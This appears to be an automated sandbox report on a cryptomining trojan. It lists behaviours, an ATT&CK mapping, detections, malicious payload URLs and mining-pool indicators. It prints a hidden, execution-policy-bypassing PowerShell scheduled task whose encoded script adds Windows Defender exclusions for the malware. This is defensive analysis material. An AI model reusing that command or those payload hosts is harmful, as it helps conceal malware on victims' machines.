Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Queries volume information: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Code function: 8_2_0000000140348448 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_0000000140348448

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	311 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	124 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	22 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	241 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
o9OIGsDt4m.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
o9OIGsDt4m.exe	42%	Virustotal		Browse
o9OIGsDt4m.exe	100%	Avira	HEUR/AGEN.1358722
o9OIGsDt4m.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	42%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
2x.si	16%	Virustotal	Browse
pool.hashvault.pro	7%	Virustotal	Browse
strompreis.ru	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/14436606/23354	0%	Avira URL Cloud	safe
http://crl.mic	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://stackoverflow.com/q/14436606/23354	0%	Virustotal		Browse
https://2x.si/o3M.dllE	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	2%	Virustotal		Browse
https://stackoverflow.com/q/11564914/23354;	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://stackoverflow.com/q/2152978/23354	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
http://crl.micft.cMicRosof	0%	Avira URL Cloud	safe
https://stackoverflow.com/q/2152978/23354	0%	Virustotal		Browse
https://xmrig.com/docs/algorithms	2%	Virustotal		Browse
https://stackoverflow.com/q/11564914/23354;	0%	Virustotal		Browse
https://xmrig.com/wizard%s	2%	Virustotal		Browse
https://files.catbox.moe/k541xr.dll	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	2%	Virustotal		Browse
https://2x.si/o3M.dll	0%	Avira URL Cloud	safe
https://files.catbox.moe/k541xr.dll	10%	Virustotal		Browse
https://2x.si/o3M.dll	12%	Virustotal		Browse
https://files.catbox.moe/kwfxr7.dll	9%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2x.si	172.67.143.156	true	false	16%, Virustotal, Browse	unknown
pool.hashvault.pro	95.179.241.203	true	true	7%, Virustotal, Browse	unknown
strompreis.ru	45.11.229.96	true	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://2x.si/o3M.dll	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2167540557.00000226B12E1000.00000004.00000800.00020000.00000000.sdmp, AddInUtil.exe, 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F1D6000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F0B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-netJ	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C18FC000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2696904592.000001F96F6CC000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 00000002.00000002.2253526712.00000207AE62F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2x.si/o3M.dllE	AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://files.catbox.moe/kwfxr7.dll	AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000009.00000002.2691830149.000001F95F174000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354	o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2129948515.000001FA0CB20000.00000004.08000000.00040000.00000000.sdmp, o9OIGsDt4m.exe, 00000000.00000002.2132804685.000001FA1D266000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000004.00000002.2181255354.00000226C188E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2197811739.000002079610A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2239588059.00000207A5F52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://xmrig.com/docs/algorithms	AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	AddInUtil.exe, 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.micft.cMicRosof	powershell.exe, 00000002.00000002.2253526712.00000207AE62F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2197811739.0000020795EE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://files.catbox.moe/k541xr.dll	AddInUtil.exe, 00000005.00000002.4570473066.0000023C54711000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	o9OIGsDt4m.exe, 00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197811739.0000020795EE1000.00000004.00000800.00020000.00000000.sdmp, AddInUtil.exe, 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.76.89.70	unknown	United States	20473	AS-CHOOPAUS	true
172.67.143.156	2x.si	United States	13335	CLOUDFLARENETUS	false
45.11.229.96	strompreis.ru	Germany	397525	ALPHAONE-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1513634
Start date and time:	2024-09-19 02:24:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	o9OIGsDt4m.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@11/9@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AddInProcess.exe, PID 5808 because there are no executed function
Execution Graph export aborted for target o9OIGsDt4m.exe, PID 6380 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2300 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:25:11	Task Scheduler	Run new task: iimvdig path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
02:25:11	Task Scheduler	Run new task: Current path: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
20:25:09	API Interceptor	1x Sleep call for process: o9OIGsDt4m.exe modified
20:25:12	API Interceptor	28x Sleep call for process: powershell.exe modified
20:25:14	API Interceptor	1370187x Sleep call for process: AddInUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
45.76.89.70	System.exe	Get hash	malicious	Xmrig	Browse
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	gutpOKDunr.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.FileRepMalware.3253.21057.exe	Get hash	malicious	Xmrig	Browse
	sc7Qi5VdE1.exe	Get hash	malicious	Xmrig	Browse
	II.exe	Get hash	malicious	Xmrig	Browse
172.67.143.156	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse
45.11.229.96	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse
45.11.229.96	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2x.si	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	172.67.143.156
pool.hashvault.pro	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Flesh Stealer, Xmrig	Browse	142.202.242.45
	System.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	Update.exe	Get hash	malicious	Blank Grabber, Redline Clipper, Xmrig	Browse	45.76.89.70
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	142.202.242.43
	file.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	gutpOKDunr.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
strompreis.ru	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
strompreis.ru	4FwNHRnnXb.exe	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ESD99W89W99-PO9W2788Q-SHK092782.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	http://okcoin.83670.cyou/Index/index/Lang/it-it/Trade/tradelist	Get hash	malicious	Unknown	Browse	104.21.13.231
	http://jans-radical-site-16409d.webflow.io/	Get hash	malicious	Unknown	Browse	104.18.161.117
	http://terjal.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://sreypheasin.github.io/Netflix/	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://in-50card.ru/wr	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://meatamasklogine.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.147.209
	http://pub-60aa8cdea4ff48c8b784d120879cbb5a.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://request-checksid-711843.pages.dev/robots.txt/	Get hash	malicious	Unknown	Browse	104.26.13.205
	http://netflix.benasenso.site/	Get hash	malicious	Unknown	Browse	172.66.0.227
AS-CHOOPAUS	http://www.national-delivery.com/Fuel_Surcharge	Get hash	malicious	Unknown	Browse	207.148.0.16
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	System.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
